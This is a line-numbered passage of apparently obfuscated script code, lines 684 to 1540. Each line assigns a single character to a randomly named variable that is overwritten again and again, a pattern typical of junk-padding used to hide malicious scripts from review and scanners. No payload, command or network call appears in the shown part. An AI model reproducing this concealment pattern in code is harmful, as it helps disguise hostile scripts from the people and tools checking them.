684 | kemvuzuqh = "i"; | |
685 | kemvuzuqh = "h"; | |
686 | kemvuzuqh = "h"; | |
687 | kemvuzuqh = "U"; | |
688 | kemvuzuqh = "i"; | |
689 | kemvuzuqh = "L"; | |
690 | kemvuzuqh = "L"; | |
691 | kemvuzuqh = "A"; | |
692 | kemvuzuqh = "Y"; | |
693 | kemvuzuqh = "P"; | |
694 | kemvuzuqh = "3"; | |
695 | aeloskpvj = "Q"; | |
696 | aeloskpvj = "c"; | |
697 | aeloskpvj = "O"; | |
698 | aeloskpvj = "l"; | |
699 | aeloskpvj = "y"; | |
700 | aeloskpvj = "U"; | |
701 | aeloskpvj = "G"; | |
702 | aeloskpvj = "j"; | |
703 | aeloskpvj = "A"; | |
704 | aeloskpvj = "j"; | |
705 | aeloskpvj = "T"; | |
706 | aeloskpvj = "C"; | |
707 | aeloskpvj = "i"; | |
708 | aeloskpvj = "t"; | |
709 | aeloskpvj = "p"; | |
710 | aeloskpvj = "L"; | |
711 | aeloskpvj = "N"; | |
712 | aeloskpvj = "B"; | |
713 | aeloskpvj = "x"; | |
714 | aeloskpvj = "O"; | |
715 | aeloskpvj = "c"; | |
716 | aeloskpvj = "t"; | |
717 | aeloskpvj = "w"; | |
718 | aeloskpvj = "s"; | |
719 | aeloskpvj = "\\"; | |
720 | euvrr = "v"; | |
721 | euvrr = "M"; | |
722 | euvrr = "K"; | |
723 | euvrr = "m"; | |
724 | euvrr = "z"; | |
725 | euvrr = "x"; | |
726 | euvrr = "h"; | |
727 | euvrr = "I"; | |
728 | euvrr = "Q"; | |
729 | euvrr = "y"; | |
730 | euvrr = "X"; | |
731 | euvrr = "y"; | |
732 | euvrr = "T"; | |
733 | euvrr = "O"; | |
734 | euvrr = "D"; | |
735 | euvrr = "H"; | |
736 | euvrr = "S"; | |
737 | euvrr = "M"; | |
738 | euvrr = "z"; | |
739 | euvrr = "g"; | |
740 | euvrr = "F"; | |
741 | euvrr = "u"; | |
742 | euvrr = "j"; | |
743 | euvrr = "F"; | |
744 | rookxhjso = "V"; | |
745 | rookxhjso = "S"; | |
746 | rookxhjso = "q"; | |
747 | rookxhjso = "o"; | |
748 | rookxhjso = "V"; | |
749 | rookxhjso = "X"; | |
750 | rookxhjso = "N"; | |
751 | rookxhjso = "u"; | |
752 | rookxhjso = "y"; | |
753 | rookxhjso = "c"; | |
754 | rookxhjso = "v"; | |
755 | rookxhjso = "T"; | |
756 | rookxhjso = "v"; | |
757 | rookxhjso = "F"; | |
758 | rookxhjso = "c"; | |
759 | rookxhjso = "c"; | |
760 | rookxhjso = "e"; | |
761 | rookxhjso = "B"; | |
762 | rookxhjso = "C"; | |
763 | rookxhjso = "o"; | |
764 | rookxhjso = "X"; | |
765 | rookxhjso = "m"; | |
766 | rookxhjso = "I"; | |
767 | rookxhjso = "x"; | |
768 | rookxhjso = "B"; | |
769 | rookxhjso = "n"; | |
770 | rookxhjso = "e"; | |
771 | rookxhjso = "m"; | |
772 | rookxhjso = "l"; | |
773 | rookxhjso = "J"; | |
774 | rookxhjso = "U"; | |
775 | rookxhjso = "f"; | |
776 | rookxhjso = "n"; | |
777 | rookxhjso = "A"; | |
778 | rookxhjso = "g"; | |
779 | rookxhjso = "4"; | |
780 | yyfshldb = "H"; | |
781 | yyfshldb = "J"; | |
782 | yyfshldb = "t"; | |
783 | yyfshldb = "a"; | |
784 | yyfshldb = "I"; | |
785 | yyfshldb = "m"; | |
786 | yyfshldb = "u"; | |
787 | yyfshldb = "k"; | |
788 | jaehvb = "0"; | |
789 | gamqh = "D"; | |
790 | gamqh = "L"; | |
791 | gamqh = "y"; | |
792 | gamqh = "Z"; | |
793 | gamqh = "o"; | |
794 | gamqh = "H"; | |
795 | gamqh = "k"; | |
796 | gamqh = "C"; | |
797 | gamqh = "n"; | |
798 | gamqh = "x"; | |
799 | gamqh = "a"; | |
800 | gamqh = "d"; | |
801 | gamqh = "w"; | |
802 | gamqh = "q"; | |
803 | gamqh = "b"; | |
804 | gamqh = "N"; | |
805 | gtorftl = "T"; | |
806 | gtorftl = "D"; | |
807 | gtorftl = "Z"; | |
808 | gtorftl = "e"; | |
809 | gtorftl = "b"; | |
810 | gtorftl = "I"; | |
811 | gtorftl = "a"; | |
812 | gtorftl = "r"; | |
813 | gtorftl = "i"; | |
814 | gtorftl = "A"; | |
815 | gtorftl = "P"; | |
816 | gtorftl = "m"; | |
817 | gtorftl = "F"; | |
818 | gtorftl = "e"; | |
819 | gtorftl = "x"; | |
820 | gtorftl = "L"; | |
821 | gtorftl = "W"; | |
822 | gtorftl = "f"; | |
823 | gtorftl = "X"; | |
824 | gtorftl = "c"; | |
825 | gtorftl = "h"; | |
826 | gtorftl = "P"; | |
827 | gtorftl = "B"; | |
828 | gtorftl = "J"; | |
829 | gtorftl = "k"; | |
830 | gtorftl = "q"; | |
831 | gtorftl = "W"; | |
832 | gtorftl = "c"; | |
833 | gtorftl = "M"; | |
834 | gtorftl = "A"; | |
835 | gtorftl = "J"; | |
836 | gtorftl = "X"; | |
837 | gtorftl = "7"; | |
838 | xteppil = "a"; | |
839 | xteppil = "N"; | |
840 | xteppil = "M"; | |
841 | xteppil = "b"; | |
842 | xteppil = "f"; | |
843 | xteppil = "V"; | |
844 | xteppil = "m"; | |
845 | xteppil = "i"; | |
846 | xteppil = "L"; | |
847 | xteppil = "A"; | |
848 | xteppil = "G"; | |
849 | xteppil = "o"; | |
850 | xteppil = "D"; | |
851 | xteppil = "K"; | |
852 | xteppil = "M"; | |
853 | xteppil = "d"; | |
854 | xteppil = "y"; | |
855 | xteppil = "T"; | |
856 | xteppil = "c"; | |
857 | xteppil = "F"; | |
858 | xteppil = "I"; | |
859 | xteppil = "w"; | |
860 | xteppil = "a"; | |
861 | xteppil = "j"; | |
862 | xteppil = "o"; | |
863 | xteppil = "K"; | |
864 | xteppil = "k"; | |
865 | xteppil = "E"; | |
866 | xteppil = "H"; | |
867 | xteppil = "Q"; | |
868 | xteppil = "I"; | |
869 | xteppil = "q"; | |
870 | xteppil = "p"; | |
871 | xteppil = "d"; | |
872 | xteppil = "F"; | |
873 | xteppil = "x"; | |
874 | xteppil = "e"; | |
875 | xteppil = "Q"; | |
876 | xteppil = "n"; | |
877 | ehcaqs = "V"; | |
878 | ehcaqs = "X"; | |
879 | ehcaqs = "x"; | |
880 | ehcaqs = "V"; | |
881 | ehcaqs = "d"; | |
882 | ehcaqs = "z"; | |
883 | ehcaqs = "L"; | |
884 | ehcaqs = "a"; | |
885 | ncsmxpuye = "m"; | |
886 | ncsmxpuye = "t"; | |
887 | ncsmxpuye = "r"; | |
888 | ncsmxpuye = "r"; | |
889 | ncsmxpuye = "W"; | |
890 | ncsmxpuye = "g"; | |
891 | ncsmxpuye = "q"; | |
892 | ncsmxpuye = "D"; | |
893 | ncsmxpuye = "Q"; | |
894 | ncsmxpuye = "y"; | |
895 | ncsmxpuye = "d"; | |
896 | ncsmxpuye = "p"; | |
897 | ncsmxpuye = "N"; | |
898 | ncsmxpuye = "O"; | |
899 | ncsmxpuye = "R"; | |
900 | ncsmxpuye = "l"; | |
901 | ncsmxpuye = "u"; | |
902 | ncsmxpuye = "U"; | |
903 | ncsmxpuye = "J"; | |
904 | ncsmxpuye = "z"; | |
905 | ncsmxpuye = "x"; | |
906 | ncsmxpuye = "L"; | |
907 | ncsmxpuye = "R"; | |
908 | ncsmxpuye = "Q"; | |
909 | ncsmxpuye = "i"; | |
910 | ncsmxpuye = "r"; | |
911 | ncsmxpuye = "O"; | |
912 | ncsmxpuye = "M"; | |
913 | ncsmxpuye = "t"; | |
914 | ncsmxpuye = "t"; | |
915 | ncsmxpuye = "g"; | |
916 | ncsmxpuye = "j"; | |
917 | ncsmxpuye = "S"; | |
918 | ncsmxpuye = "t"; | |
919 | ncsmxpuye = "Y"; | |
920 | ncsmxpuye = "g"; | |
921 | ncsmxpuye = "s"; | |
922 | ncsmxpuye = "k"; | |
923 | ncsmxpuye = "l"; | |
924 | ncsmxpuye = "y"; | |
925 | ncsmxpuye = "W"; | |
926 | ncsmxpuye = "i"; | |
927 | ncsmxpuye = "C"; | |
928 | ncsmxpuye = "W"; | |
929 | ncsmxpuye = "W"; | |
930 | dtshhhyih = "J"; | |
931 | dtshhhyih = "K"; | |
932 | dtshhhyih = "p"; | |
933 | dtshhhyih = "x"; | |
934 | dtshhhyih = "j"; | |
935 | dtshhhyih = "M"; | |
936 | dtshhhyih = "R"; | |
937 | dtshhhyih = "T"; | |
938 | dtshhhyih = "d"; | |
939 | dtshhhyih = "J"; | |
940 | dtshhhyih = "O"; | |
941 | dtshhhyih = "J"; | |
942 | dtshhhyih = "s"; | |
943 | dtshhhyih = "R"; | |
944 | dtshhhyih = "D"; | |
945 | dtshhhyih = "C"; | |
946 | dtshhhyih = "e"; | |
947 | dtshhhyih = "F"; | |
948 | dtshhhyih = "B"; | |
949 | dtshhhyih = "6"; | |
950 | wbmop = "A"; | |
951 | wbmop = "S"; | |
952 | wbmop = "L"; | |
953 | wbmop = "w"; | |
954 | wbmop = "X"; | |
955 | wbmop = "C"; | |
956 | wbmop = "E"; | |
957 | wbmop = "T"; | |
958 | wbmop = "M"; | |
959 | wbmop = "F"; | |
960 | wbmop = "o"; | |
961 | wbmop = "t"; | |
962 | wbmop = "O"; | |
963 | wbmop = "U"; | |
964 | wbmop = "x"; | |
965 | wbmop = "R"; | |
966 | wbmop = "l"; | |
967 | wbmop = "N"; | |
968 | wbmop = "U"; | |
969 | wbmop = "a"; | |
970 | wbmop = "r"; | |
971 | wbmop = "h"; | |
972 | wbmop = "A"; | |
973 | wbmop = "O"; | |
974 | wbmop = "u"; | |
975 | wbmop = "h"; | |
976 | wbmop = "X"; | |
977 | wbmop = "M"; | |
978 | wbmop = "G"; | |
979 | wbmop = "H"; | |
980 | wbmop = "b"; | |
981 | wbmop = "v"; | |
982 | wbmop = "z"; | |
983 | wbmop = "v"; | |
984 | urbvq = "q"; | |
985 | urbvq = "d"; | |
986 | urbvq = "n"; | |
987 | urbvq = "g"; | |
988 | urbvq = "i"; | |
989 | urbvq = "X"; | |
990 | urbvq = "z"; | |
991 | urbvq = "z"; | |
992 | urbvq = "P"; | |
993 | urbvq = "V"; | |
994 | urbvq = "c"; | |
995 | urbvq = "y"; | |
996 | urbvq = "u"; | |
997 | urbvq = "R"; | |
998 | urbvq = "Q"; | |
999 | urbvq = "E"; | |
1000 | urbvq = "k"; | |
1001 | urbvq = "R"; | |
1002 | urbvq = "w"; | |
1003 | urbvq = "G"; | |
1004 | urbvq = "k"; | |
1005 | urbvq = "E"; | |
1006 | urbvq = "F"; | |
1007 | urbvq = "w"; | |
1008 | urbvq = "D"; | |
1009 | urbvq = "S"; | |
1010 | urbvq = "c"; | |
1011 | urbvq = "e"; | |
1012 | urbvq = "8"; | |
1013 | svdjdmt = "E"; | |
1014 | svdjdmt = "j"; | |
1015 | svdjdmt = "n"; | |
1016 | svdjdmt = "G"; | |
1017 | svdjdmt = "C"; | |
1018 | svdjdmt = "e"; | |
1019 | svdjdmt = "q"; | |
1020 | svdjdmt = "a"; | |
1021 | svdjdmt = "D"; | |
1022 | svdjdmt = "s"; | |
1023 | svdjdmt = "L"; | |
1024 | svdjdmt = "g"; | |
1025 | etxppesu = "f"; | |
1026 | etxppesu = "Z"; | |
1027 | etxppesu = "O"; | |
1028 | etxppesu = "y"; | |
1029 | etxppesu = "W"; | |
1030 | etxppesu = "M"; | |
1031 | etxppesu = "Y"; | |
1032 | etxppesu = "x"; | |
1033 | etxppesu = "J"; | |
1034 | etxppesu = "p"; | |
1035 | etxppesu = "n"; | |
1036 | etxppesu = "f"; | |
1037 | etxppesu = "r"; | |
1038 | etxppesu = "g"; | |
1039 | etxppesu = "O"; | |
1040 | etxppesu = "J"; | |
1041 | etxppesu = "W"; | |
1042 | etxppesu = "o"; | |
1043 | etxppesu = "T"; | |
1044 | etxppesu = "P"; | |
1045 | etxppesu = "m"; | |
1046 | etxppesu = "f"; | |
1047 | etxppesu = "z"; | |
1048 | etxppesu = "A"; | |
1049 | etxppesu = "U"; | |
1050 | etxppesu = "o"; | |
1051 | etxppesu = "X"; | |
1052 | etxppesu = "X"; | |
1053 | etxppesu = "N"; | |
1054 | etxppesu = "F"; | |
1055 | etxppesu = "i"; | |
1056 | etxppesu = "h"; | |
1057 | etxppesu = "h"; | |
1058 | etxppesu = "S"; | |
1059 | ksiue = "h"; | |
1060 | ksiue = "K"; | |
1061 | ksiue = "B"; | |
1062 | ksiue = "d"; | |
1063 | ksiue = "G"; | |
1064 | ksiue = "h"; | |
1065 | ksiue = "J"; | |
1066 | ksiue = "g"; | |
1067 | ksiue = "E"; | |
1068 | ksiue = "J"; | |
1069 | ksiue = "F"; | |
1070 | ksiue = "y"; | |
1071 | ksiue = "v"; | |
1072 | ksiue = "x"; | |
1073 | ksiue = "b"; | |
1074 | ksiue = "V"; | |
1075 | ksiue = "Y"; | |
1076 | ksiue = "R"; | |
1077 | ksiue = "g"; | |
1078 | ksiue = "U"; | |
1079 | ksiue = "w"; | |
1080 | ksiue = "x"; | |
1081 | ksiue = "T"; | |
1082 | ksiue = "R"; | |
1083 | ksiue = "&"; | |
1084 | yizus = "H"; | |
1085 | yizus = "g"; | |
1086 | yizus = "N"; | |
1087 | yizus = "D"; | |
1088 | yizus = "N"; | |
1089 | yizus = "G"; | |
1090 | yizus = "C"; | |
1091 | yizus = "n"; | |
1092 | yizus = "p"; | |
1093 | yizus = "D"; | |
1094 | yizus = "V"; | |
1095 | yizus = "f"; | |
1096 | yizus = "q"; | |
1097 | yizus = "r"; | |
1098 | yizus = "g"; | |
1099 | yizus = "A"; | |
1100 | yizus = "k"; | |
1101 | yizus = "x"; | |
1102 | yizus = "l"; | |
1103 | yizus = "s"; | |
1104 | yizus = "Z"; | |
1105 | yizus = "X"; | |
1106 | yizus = "O"; | |
1107 | yizus = "j"; | |
1108 | futjuyv = "E"; | |
1109 | futjuyv = "V"; | |
1110 | futjuyv = "L"; | |
1111 | jdxbzdmde = "e"; | |
1112 | jdxbzdmde = "U"; | |
1113 | jdxbzdmde = "C"; | |
1114 | jdxbzdmde = "n"; | |
1115 | jdxbzdmde = "l"; | |
1116 | jdxbzdmde = "g"; | |
1117 | jdxbzdmde = "s"; | |
1118 | jdxbzdmde = "k"; | |
1119 | jdxbzdmde = "d"; | |
1120 | jdxbzdmde = "z"; | |
1121 | jdxbzdmde = "s"; | |
1122 | jdxbzdmde = "R"; | |
1123 | jdxbzdmde = "X"; | |
1124 | jdxbzdmde = "T"; | |
1125 | jdxbzdmde = "j"; | |
1126 | jdxbzdmde = "r"; | |
1127 | jdxbzdmde = "I"; | |
1128 | jdxbzdmde = "N"; | |
1129 | jdxbzdmde = "q"; | |
1130 | jdxbzdmde = "l"; | |
1131 | jdxbzdmde = "X"; | |
1132 | jdxbzdmde = "I"; | |
1133 | jdxbzdmde = "v"; | |
1134 | jdxbzdmde = "z"; | |
1135 | jdxbzdmde = "I"; | |
1136 | jdxbzdmde = "C"; | |
1137 | jdxbzdmde = "D"; | |
1138 | jdxbzdmde = "q"; | |
1139 | jdxbzdmde = "F"; | |
1140 | jdxbzdmde = "S"; | |
1141 | jdxbzdmde = "K"; | |
1142 | jdxbzdmde = "Z"; | |
1143 | jdxbzdmde = "V"; | |
1144 | jdxbzdmde = "u"; | |
1145 | jdxbzdmde = "U"; | |
1146 | jdxbzdmde = "N"; | |
1147 | jdxbzdmde = "i"; | |
1148 | ghfxntfr = "k"; | |
1149 | ghfxntfr = "t"; | |
1150 | ghfxntfr = "h"; | |
1151 | ghfxntfr = "J"; | |
1152 | ghfxntfr = "o"; | |
1153 | ghfxntfr = "U"; | |
1154 | ghfxntfr = "c"; | |
1155 | ghfxntfr = "M"; | |
1156 | ghfxntfr = "W"; | |
1157 | ghfxntfr = "h"; | |
1158 | ghfxntfr = "I"; | |
1159 | ghfxntfr = "t"; | |
1160 | ghfxntfr = "n"; | |
1161 | ghfxntfr = "p"; | |
1162 | ghfxntfr = "D"; | |
1163 | ghfxntfr = "b"; | |
1164 | ghfxntfr = "y"; | |
1165 | ghfxntfr = "A"; | |
1166 | ghfxntfr = "r"; | |
1167 | ghfxntfr = "X"; | |
1168 | ghfxntfr = "j"; | |
1169 | ghfxntfr = "n"; | |
1170 | ghfxntfr = "p"; | |
1171 | ghfxntfr = "s"; | |
1172 | ghfxntfr = "g"; | |
1173 | ghfxntfr = "p"; | |
1174 | ghfxntfr = "V"; | |
1175 | ghfxntfr = "e"; | |
1176 | ghfxntfr = "T"; | |
1177 | ghfxntfr = "j"; | |
1178 | ghfxntfr = "j"; | |
1179 | ghfxntfr = "h"; | |
1180 | ghfxntfr = "G"; | |
1181 | ghfxntfr = "t"; | |
1182 | ghfxntfr = "i"; | |
1183 | ghfxntfr = "J"; | |
1184 | ghfxntfr = "N"; | |
1185 | ghfxntfr = "t"; | |
1186 | ghfxntfr = "P"; | |
1187 | ghfxntfr = "D"; | |
1188 | ghfxntfr = "I"; | |
1189 | iiyvihxoo = "e"; | |
1190 | iiyvihxoo = "s"; | |
1191 | iiyvihxoo = "a"; | |
1192 | iiyvihxoo = "K"; | |
1193 | iiyvihxoo = "v"; | |
1194 | iiyvihxoo = "W"; | |
1195 | iiyvihxoo = "M"; | |
1196 | iiyvihxoo = "K"; | |
1197 | iiyvihxoo = "M"; | |
1198 | iiyvihxoo = "w"; | |
1199 | iiyvihxoo = "M"; | |
1200 | iiyvihxoo = "u"; | |
1201 | iiyvihxoo = "M"; | |
1202 | iiyvihxoo = "x"; | |
1203 | iiyvihxoo = "U"; | |
1204 | iiyvihxoo = "n"; | |
1205 | iiyvihxoo = "c"; | |
1206 | iiyvihxoo = "c"; | |
1207 | iiyvihxoo = "W"; | |
1208 | iiyvihxoo = "S"; | |
1209 | iiyvihxoo = "d"; | |
1210 | iiyvihxoo = "i"; | |
1211 | iiyvihxoo = "E"; | |
1212 | iiyvihxoo = "i"; | |
1213 | iiyvihxoo = "i"; | |
1214 | iiyvihxoo = "w"; | |
1215 | iiyvihxoo = "g"; | |
1216 | iiyvihxoo = "O"; | |
1217 | iiyvihxoo = "w"; | |
1218 | iiyvihxoo = "B"; | |
1219 | iiyvihxoo = "r"; | |
1220 | iiyvihxoo = "V"; | |
1221 | iiyvihxoo = "p"; | |
1222 | iiyvihxoo = "c"; | |
1223 | iiyvihxoo = "q"; | |
1224 | iiyvihxoo = "l"; | |
1225 | iiyvihxoo = "X"; | |
1226 | iiyvihxoo = "D"; | |
1227 | iiyvihxoo = "K"; | |
1228 | iiyvihxoo = "x"; | |
1229 | iiyvihxoo = "P"; | |
1230 | rarukq = "z"; | |
1231 | rarukq = "E"; | |
1232 | rarukq = "T"; | |
1233 | rarukq = "y"; | |
1234 | rarukq = "f"; | |
1235 | rarukq = "G"; | |
1236 | rarukq = "g"; | |
1237 | rarukq = "m"; | |
1238 | rarukq = "i"; | |
1239 | rarukq = "P"; | |
1240 | rarukq = "y"; | |
1241 | rarukq = "r"; | |
1242 | rarukq = "E"; | |
1243 | rarukq = "N"; | |
1244 | rarukq = "i"; | |
1245 | rarukq = "q"; | |
1246 | rarukq = "m"; | |
1247 | rarukq = "p"; | |
1248 | rarukq = "d"; | |
1249 | rarukq = "X"; | |
1250 | rarukq = "V"; | |
1251 | rarukq = "X"; | |
1252 | rarukq = "c"; | |
1253 | rarukq = "V"; | |
1254 | rarukq = "C"; | |
1255 | rarukq = "S"; | |
1256 | rarukq = "C"; | |
1257 | rarukq = "a"; | |
1258 | rarukq = "l"; | |
1259 | rarukq = "G"; | |
1260 | rarukq = "L"; | |
1261 | rarukq = "a"; | |
1262 | rarukq = "l"; | |
1263 | rarukq = "s"; | |
1264 | rarukq = "i"; | |
1265 | rarukq = "Q"; | |
1266 | rarukq = "U"; | |
1267 | rarukq = "H"; | |
1268 | rarukq = "X"; | |
1269 | rarukq = "\""; | |
1270 | eyoylqh = "j"; | |
1271 | eyoylqh = "m"; | |
1272 | eyoylqh = "c"; | |
1273 | eyoylqh = "j"; | |
1274 | eyoylqh = "R"; | |
1275 | eyoylqh = "O"; | |
1276 | eyoylqh = "d"; | |
1277 | eyoylqh = "h"; | |
1278 | eyoylqh = "r"; | |
1279 | eyoylqh = "Q"; | |
1280 | eyoylqh = "K"; | |
1281 | eyoylqh = "x"; | |
1282 | eyoylqh = "y"; | |
1283 | eyoylqh = "x"; | |
1284 | eyoylqh = "E"; | |
1285 | eyoylqh = "p"; | |
1286 | dlouhoq = "M"; | |
1287 | dlouhoq = "N"; | |
1288 | dlouhoq = "K"; | |
1289 | dlouhoq = "9"; | |
1290 | xzraruzfc = "F"; | |
1291 | xzraruzfc = "M"; | |
1292 | xzraruzfc = "s"; | |
1293 | xzraruzfc = "J"; | |
1294 | xzraruzfc = "r"; | |
1295 | xzraruzfc = "u"; | |
1296 | xzraruzfc = "B"; | |
1297 | xzraruzfc = "o"; | |
1298 | xzraruzfc = "m"; | |
1299 | xzraruzfc = "k"; | |
1300 | xzraruzfc = "G"; | |
1301 | xzraruzfc = "S"; | |
1302 | xzraruzfc = "j"; | |
1303 | xzraruzfc = "l"; | |
1304 | xzraruzfc = "o"; | |
1305 | xzraruzfc = "a"; | |
1306 | xzraruzfc = "P"; | |
1307 | xzraruzfc = "e"; | |
1308 | xzraruzfc = "j"; | |
1309 | xzraruzfc = "T"; | |
1310 | xzraruzfc = "s"; | |
1311 | xzraruzfc = "k"; | |
1312 | xzraruzfc = "i"; | |
1313 | xzraruzfc = "Z"; | |
1314 | xzraruzfc = "k"; | |
1315 | xzraruzfc = "n"; | |
1316 | xzraruzfc = "H"; | |
1317 | xzraruzfc = "B"; | |
1318 | xzraruzfc = "X"; | |
1319 | xzraruzfc = "p"; | |
1320 | xzraruzfc = "P"; | |
1321 | xzraruzfc = "P"; | |
1322 | xzraruzfc = "v"; | |
1323 | xzraruzfc = "z"; | |
1324 | xzraruzfc = "h"; | |
1325 | xzraruzfc = "b"; | |
1326 | xzraruzfc = "w"; | |
1327 | xzraruzfc = "R"; | |
1328 | bnnqtsf = "O"; | |
1329 | bnnqtsf = "D"; | |
1330 | bnnqtsf = "a"; | |
1331 | bnnqtsf = "l"; | |
1332 | bnnqtsf = "s"; | |
1333 | bnnqtsf = "B"; | |
1334 | bnnqtsf = "K"; | |
1335 | ymshiu = "k"; | |
1336 | ymshiu = "w"; | |
1337 | ymshiu = "u"; | |
1338 | ymshiu = "e"; | |
1339 | ymshiu = "a"; | |
1340 | ymshiu = "W"; | |
1341 | ymshiu = "B"; | |
1342 | ymshiu = "Y"; | |
1343 | ymshiu = "J"; | |
1344 | ymshiu = "F"; | |
1345 | ymshiu = "V"; | |
1346 | ymshiu = "I"; | |
1347 | ymshiu = "z"; | |
1348 | ymshiu = "i"; | |
1349 | ymshiu = "W"; | |
1350 | ymshiu = "e"; | |
1351 | ymshiu = "n"; | |
1352 | ymshiu = "C"; | |
1353 | ymshiu = "c"; | |
1354 | ymshiu = "Y"; | |
1355 | ymshiu = "D"; | |
1356 | ymshiu = "I"; | |
1357 | ymshiu = "T"; | |
1358 | ymshiu = "r"; | |
1359 | ymshiu = "F"; | |
1360 | ymshiu = "v"; | |
1361 | ymshiu = "P"; | |
1362 | ymshiu = "E"; | |
1363 | ymshiu = "a"; | |
1364 | ymshiu = "U"; | |
1365 | yqwjnf = "p"; | |
1366 | yqwjnf = "O"; | |
1367 | yqwjnf = "k"; | |
1368 | yqwjnf = "n"; | |
1369 | yqwjnf = "C"; | |
1370 | yqwjnf = "M"; | |
1371 | yqwjnf = "h"; | |
1372 | yqwjnf = "h"; | |
1373 | yqwjnf = "q"; | |
1374 | yqwjnf = "w"; | |
1375 | yqwjnf = "t"; | |
1376 | yqwjnf = "c"; | |
1377 | yqwjnf = "S"; | |
1378 | yqwjnf = "Z"; | |
1379 | yqwjnf = "g"; | |
1380 | yqwjnf = "q"; | |
1381 | yqwjnf = "z"; | |
1382 | yqwjnf = "w"; | |
1383 | yqwjnf = "b"; | |
1384 | yqwjnf = "w"; | |
1385 | yqwjnf = "H"; | |
1386 | yqwjnf = "w"; | |
1387 | yqwjnf = "l"; | |
1388 | yqwjnf = "h"; | |
1389 | yqwjnf = "P"; | |
1390 | yqwjnf = "v"; | |
1391 | yqwjnf = "O"; | |
1392 | yqwjnf = "a"; | |
1393 | yqwjnf = "V"; | |
1394 | yqwjnf = "u"; | |
1395 | yqwjnf = "R"; | |
1396 | yqwjnf = "d"; | |
1397 | yqwjnf = "u"; | |
1398 | dyzvb = "K"; | |
1399 | dyzvb = "D"; | |
1400 | dyzvb = "y"; | |
1401 | dyzvb = "k"; | |
1402 | dyzvb = "y"; | |
1403 | dyzvb = "i"; | |
1404 | dyzvb = "P"; | |
1405 | dyzvb = "w"; | |
1406 | dyzvb = "a"; | |
1407 | dyzvb = "Q"; | |
1408 | dyzvb = "T"; | |
1409 | dyzvb = "X"; | |
1410 | dyzvb = "q"; | |
1411 | dyzvb = "N"; | |
1412 | dyzvb = "P"; | |
1413 | dyzvb = "G"; | |
1414 | dyzvb = "F"; | |
1415 | dyzvb = "v"; | |
1416 | dyzvb = "C"; | |
1417 | dyzvb = "N"; | |
1418 | dyzvb = "b"; | |
1419 | dyzvb = "m"; | |
1420 | dyzvb = "i"; | |
1421 | dyzvb = "R"; | |
1422 | dyzvb = "Y"; | |
1423 | ttuwohpxg = "n"; | |
1424 | ttuwohpxg = "H"; | |
1425 | ttuwohpxg = "m"; | |
1426 | ttuwohpxg = "K"; | |
1427 | ttuwohpxg = "K"; | |
1428 | ttuwohpxg = "L"; | |
1429 | ttuwohpxg = "d"; | |
1430 | ttuwohpxg = "a"; | |
1431 | ttuwohpxg = "h"; | |
1432 | ttuwohpxg = "j"; | |
1433 | ttuwohpxg = "d"; | |
1434 | ttuwohpxg = "H"; | |
1435 | ttuwohpxg = "S"; | |
1436 | ttuwohpxg = "i"; | |
1437 | ttuwohpxg = "S"; | |
1438 | ttuwohpxg = "a"; | |
1439 | ttuwohpxg = "h"; | |
1440 | ttuwohpxg = "O"; | |
1441 | ttuwohpxg = "@"; | |
1442 | ehhdnkr = "D"; | |
1443 | ehhdnkr = "C"; | |
1444 | ehhdnkr = "L"; | |
1445 | ehhdnkr = "j"; | |
1446 | ehhdnkr = "Y"; | |
1447 | ehhdnkr = "h"; | |
1448 | ehhdnkr = "d"; | |
1449 | ehhdnkr = "S"; | |
1450 | ehhdnkr = "d"; | |
1451 | ehhdnkr = "F"; | |
1452 | ehhdnkr = "d"; | |
1453 | ehhdnkr = "j"; | |
1454 | ehhdnkr = "L"; | |
1455 | ehhdnkr = "Q"; | |
1456 | ehhdnkr = "V"; | |
1457 | ehhdnkr = "F"; | |
1458 | ehhdnkr = "B"; | |
1459 | ehhdnkr = "d"; | |
1460 | avinivqth = "A"; | |
1461 | avinivqth = "g"; | |
1462 | avinivqth = "T"; | |
1463 | avinivqth = "t"; | |
1464 | avinivqth = "s"; | |
1465 | avinivqth = "x"; | |
1466 | avinivqth = "H"; | |
1467 | avinivqth = "X"; | |
1468 | avinivqth = "S"; | |
1469 | avinivqth = "H"; | |
1470 | avinivqth = "H"; | |
1471 | avinivqth = "f"; | |
1472 | avinivqth = "d"; | |
1473 | avinivqth = "Y"; | |
1474 | avinivqth = "j"; | |
1475 | avinivqth = "j"; | |
1476 | avinivqth = "G"; | |
1477 | avinivqth = "d"; | |
1478 | avinivqth = "r"; | |
1479 | avinivqth = "X"; | |
1480 | avinivqth = "d"; | |
1481 | avinivqth = "b"; | |
1482 | avinivqth = "P"; | |
1483 | avinivqth = "u"; | |
1484 | avinivqth = "c"; | |
1485 | avinivqth = "A"; | |
1486 | avinivqth = "U"; | |
1487 | avinivqth = "n"; | |
1488 | avinivqth = " "; | |
1489 | dnooyhhbz = "C"; | |
1490 | dnooyhhbz = "X"; | |
1491 | dnooyhhbz = "n"; | |
1492 | dnooyhhbz = "x"; | |
1493 | dnooyhhbz = "N"; | |
1494 | dnooyhhbz = "G"; | |
1495 | dnooyhhbz = "r"; | |
1496 | dnooyhhbz = "H"; | |
1497 | dnooyhhbz = "r"; | |
1498 | dnooyhhbz = "r"; | |
1499 | dnooyhhbz = "v"; | |
1500 | dnooyhhbz = "r"; | |
1501 | dnooyhhbz = "O"; | |
1502 | dnooyhhbz = "i"; | |
1503 | dnooyhhbz = "G"; | |
1504 | dnooyhhbz = "E"; | |
1505 | dnooyhhbz = "K"; | |
1506 | dnooyhhbz = "k"; | |
1507 | dnooyhhbz = "F"; | |
1508 | dnooyhhbz = "u"; | |
1509 | dnooyhhbz = "s"; | |
1510 | dnooyhhbz = "d"; | |
1511 | dnooyhhbz = "n"; | |
1512 | dnooyhhbz = "H"; | |
1513 | dnooyhhbz = "a"; | |
1514 | dnooyhhbz = "p"; | |
1515 | dnooyhhbz = "C"; | |
1516 | dnooyhhbz = "m"; | |
1517 | dnooyhhbz = "a"; | |
1518 | dnooyhhbz = "W"; | |
1519 | dnooyhhbz = "z"; | |
1520 | dnooyhhbz = "M"; | |
1521 | dnooyhhbz = "5"; | |
1522 | buhhn = "Z"; | |
1523 | buhhn = "J"; | |
1524 | buhhn = "e"; | |
1525 | buhhn = "S"; | |
1526 | buhhn = "T"; | |
1527 | buhhn = "p"; | |
1528 | buhhn = "e"; | |
1529 | buhhn = "V"; | |
1530 | buhhn = "a"; | |
1531 | buhhn = "d"; | |
1532 | buhhn = "T"; | |
1533 | buhhn = "n"; | |
1534 | buhhn = "w"; | |
1535 | buhhn = "c"; | |
1536 | buhhn = "E"; | |
1537 | buhhn = "e"; | |
1538 | ndzlnjcyq = "k"; | |
1539 | ndzlnjcyq = "E"; | |
1540 | ndzlnjcyq = "P"; | |
